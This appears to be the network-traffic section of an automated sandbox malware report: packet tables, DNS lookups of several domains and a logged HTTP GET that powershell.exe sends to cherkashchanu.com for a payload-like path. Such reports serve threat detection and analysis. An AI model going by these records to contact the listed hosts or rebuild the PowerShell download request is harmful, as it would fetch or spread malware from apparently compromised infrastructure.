                                                                                                                        Mar 16, 2021 14:27:14.462013960 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.462029934 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.462146997 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.594285965 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594315052 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594327927 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594346046 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594364882 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594383955 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594400883 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594414949 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594428062 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594439983 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594456911 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594475985 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594496965 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.594563007 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.595146894 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.599009991 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.728688002 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728718996 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728733063 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728749037 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728766918 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728781939 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728802919 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728821993 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728837967 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728859901 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.728868961 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.728890896 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.728909969 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.731950045 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.731970072 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732003927 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732023001 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732039928 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732043982 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.732062101 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.732094049 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.732119083 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.859628916 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859663010 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859687090 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859710932 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859731913 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859755039 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859777927 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859806061 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859833002 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859858036 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859882116 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.859921932 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.860100985 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.863636971 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.941807032 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:14.986427069 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.990467072 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:14.990628958 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:15.036123991 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.043883085 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.043914080 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.044121981 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:15.045878887 CET4972480192.168.2.5151.106.5.169
                                                                                                                        Mar 16, 2021 14:27:15.089792967 CET8049724151.106.5.169192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.334788084 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.488329887 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.489423037 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.489614010 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.642575026 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649028063 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649059057 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649075031 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649091005 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649156094 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649173021 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649194002 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649211884 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649286985 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.649306059 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.651932955 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.652003050 CET4972580192.168.2.535.209.212.48
                                                                                                                        Mar 16, 2021 14:27:15.803983927 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804017067 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804033995 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804049969 CET804972535.209.212.48192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:15.804068089 CET804972535.209.212.48192.168.2.5
Mar 16, 2021 14:27:15.804086924 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804130077 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804148912 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804164886 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804182053 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804214001 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804209948 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.804230928 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804265022 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.804272890 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.804291010 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.804315090 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804336071 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804352999 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804368973 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804387093 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.804413080 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.804440022 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804457903 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804476023 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804492950 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.804512978 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.804536104 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.956338882 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956374884 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956393003 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956417084 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956434965 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956454039 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956468105 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956480980 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956500053 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956499100 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.956518888 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956577063 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.956581116 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956603050 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956609011 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.956680059 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956693888 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956707954 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956721067 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956748962 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956765890 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956840992 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956859112 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956917048 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956945896 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.956968069 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.957003117 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957020044 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.957027912 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957073927 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957093954 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957098007 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.957140923 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.957184076 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957211971 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957231045 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957248926 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957304955 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957313061 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.957329988 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957381964 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:15.957422018 CET | 80 | 49725 | 35.209.212.48 | 192.168.2.5
Mar 16, 2021 14:27:15.957779884 CET | 49725 | 80 | 192.168.2.5 | 35.209.212.48
Mar 16, 2021 14:27:16.047030926 CET | 49726 | 443 | 192.168.2.5 | 139.180.215.83
Mar 16, 2021 14:27:18.528503895 CET | 443 | 49722 | 107.180.2.185 | 192.168.2.5
Mar 16, 2021 14:27:18.528523922 CET | 443 | 49722 | 107.180.2.185 | 192.168.2.5
Mar 16, 2021 14:27:18.528584003 CET | 49722 | 443 | 192.168.2.5 | 107.180.2.185
Mar 16, 2021 14:27:19.065367937 CET | 49726 | 443 | 192.168.2.5 | 139.180.215.83
Mar 16, 2021 14:27:25.065949917 CET | 49726 | 443 | 192.168.2.5 | 139.180.215.83
Mar 16, 2021 14:27:37.503130913 CET | 49721 | 443 | 192.168.2.5 | 103.28.39.103
Mar 16, 2021 14:27:37.503290892 CET | 49722 | 443 | 192.168.2.5 | 107.180.2.185
Mar 16, 2021 14:27:37.504519939 CET | 49720 | 80 | 192.168.2.5 | 185.104.45.33

                                                                                                                        UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 16, 2021 14:26:45.018130064 CET | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:45.069802999 CET | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:46.239038944 CET | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:46.287806988 CET | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:47.677719116 CET | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:47.729105949 CET | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:49.083822966 CET | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:49.143712044 CET | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:50.354598045 CET | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:50.403479099 CET | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:51.384907007 CET | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:51.441956997 CET | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:51.492477894 CET | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:51.541562080 CET | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:53.860394001 CET | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:53.952194929 CET | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:54.514662981 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:54.576627016 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:55.531621933 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:55.606259108 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:56.522722960 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:56.560923100 CET | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:56.584485054 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:56.612665892 CET | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:57.611574888 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:57.660187960 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:58.538458109 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:58.590634108 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:26:58.828769922 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:26:58.885979891 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:00.515932083 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:00.573824883 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:02.555042982 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:02.607939005 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:04.154870987 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:04.216629982 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:10.490746975 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:10.583050013 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:10.839803934 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:10.897020102 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:10.922760010 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:11.290205956 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:12.798408985 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:12.861239910 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:13.529453993 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:13.594244957 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:13.598083973 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:13.657845020 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:14.883002043 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:14.940201998 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:15.159894943 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:15.326390982 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:15.969976902 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:16.045629978 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:16.525780916 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:16.574441910 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:39.407004118 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:39.466701031 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:41.013396025 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:41.071105003 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:45.594057083 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:45.646720886 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:27:52.772317886 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:27:52.834152937 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:10.778630972 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:10.838938951 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:11.385499001 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:11.474045992 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:11.644752026 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:11.709861040 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:11.952578068 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:12.009624958 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:12.876977921 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:12.925679922 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:13.875411034 CET | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:13.935401917 CET | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:14.533766031 CET | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:14.593414068 CET | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:15.393038988 CET | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:15.451446056 CET | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:16.209446907 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:16.258157969 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:17.252914906 CET | 61004 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:17.304749966 CET | 53 | 61004 | 8.8.8.8 | 192.168.2.5
Mar 16, 2021 14:28:18.151496887 CET | 56895 | 53 | 192.168.2.5 | 8.8.8.8
Mar 16, 2021 14:28:18.200567961 CET | 53 | 56895 | 8.8.8.8 | 192.168.2.5

                                                                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 16, 2021 14:27:10.490746975 CET | 192.168.2.5 | 8.8.8.8 | 0xc27e | Standard query (0) | cherkashchanu.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:10.839803934 CET | 192.168.2.5 | 8.8.8.8 | 0x3c86 | Standard query (0) | servicios.semperti.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:10.922760010 CET | 192.168.2.5 | 8.8.8.8 | 0xc636 | Standard query (0) | giatot365.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:12.798408985 CET | 192.168.2.5 | 8.8.8.8 | 0xd39e | Standard query (0) | calltorepair.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:13.529453993 CET | 192.168.2.5 | 8.8.8.8 | 0xa70d | Standard query (0) | www.calltorepair.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:13.598083973 CET | 192.168.2.5 | 8.8.8.8 | 0x751a | Standard query (0) | www.calltorepair.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:14.883002043 CET | 192.168.2.5 | 8.8.8.8 | 0xf2f6 | Standard query (0) | tongdaihanoi.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:15.159894943 CET | 192.168.2.5 | 8.8.8.8 | 0xb582 | Standard query (0) | opheliasbrewery.com | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:15.969976902 CET | 192.168.2.5 | 8.8.8.8 | 0x997 | Standard query (0) | xuanthinhshop.com | A (IP address) | IN (0x0001)

                                                                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 16, 2021 14:27:10.583050013 CET | 8.8.8.8 | 192.168.2.5 | 0xc27e | No error (0) | cherkashchanu.com | | 185.104.45.33 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:11.290205956 CET | 8.8.8.8 | 192.168.2.5 | 0xc636 | No error (0) | giatot365.com | | 103.28.39.103 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:12.861239910 CET | 8.8.8.8 | 192.168.2.5 | 0xd39e | No error (0) | calltorepair.com | | 107.180.2.185 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:13.594244957 CET | 8.8.8.8 | 192.168.2.5 | 0xa70d | No error (0) | www.calltorepair.com | calltorepair.com | | CNAME (Canonical name) | IN (0x0001)
Mar 16, 2021 14:27:13.594244957 CET | 8.8.8.8 | 192.168.2.5 | 0xa70d | No error (0) | calltorepair.com | | 107.180.2.185 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:13.657845020 CET | 8.8.8.8 | 192.168.2.5 | 0x751a | No error (0) | www.calltorepair.com | calltorepair.com | | CNAME (Canonical name) | IN (0x0001)
Mar 16, 2021 14:27:13.657845020 CET | 8.8.8.8 | 192.168.2.5 | 0x751a | No error (0) | calltorepair.com | | 107.180.2.185 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:14.940201998 CET | 8.8.8.8 | 192.168.2.5 | 0xf2f6 | No error (0) | tongdaihanoi.com | | 151.106.5.169 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:15.326390982 CET | 8.8.8.8 | 192.168.2.5 | 0xb582 | No error (0) | opheliasbrewery.com | | 35.209.212.48 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:15.326390982 CET | 8.8.8.8 | 192.168.2.5 | 0xb582 | No error (0) | opheliasbrewery.com | | 35.208.137.128 | A (IP address) | IN (0x0001)
Mar 16, 2021 14:27:16.045629978 CET | 8.8.8.8 | 192.168.2.5 | 0x997 | No error (0) | xuanthinhshop.com | | 139.180.215.83 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• cherkashchanu.com
• tongdaihanoi.com
• opheliasbrewery.com

Of the names resolved above, these three were contacted over plain HTTP (sessions below) and calltorepair.com over TLS (see HTTPS Packets); no HTTP or HTTPS session to giatot365.com or xuanthinhshop.com is recorded in this part of the report.

                                                                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49720 | 185.104.45.33 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Mar 16, 2021 14:27:10.660463095 CET | 798 | OUT | GET /Z:/4ZE8/ HTTP/1.1
Host: cherkashchanu.com
Connection: Keep-Alive
Mar 16, 2021 14:27:10.732536077 CET | 799 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 16 Mar 2021 13:27:10 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 1893
                                                                                                                        Connection: keep-alive
                                                                                                                        ETag: "60509bbf-765"
                                                                                                                        x-ray: p529:0.000/wn19994:0.000/
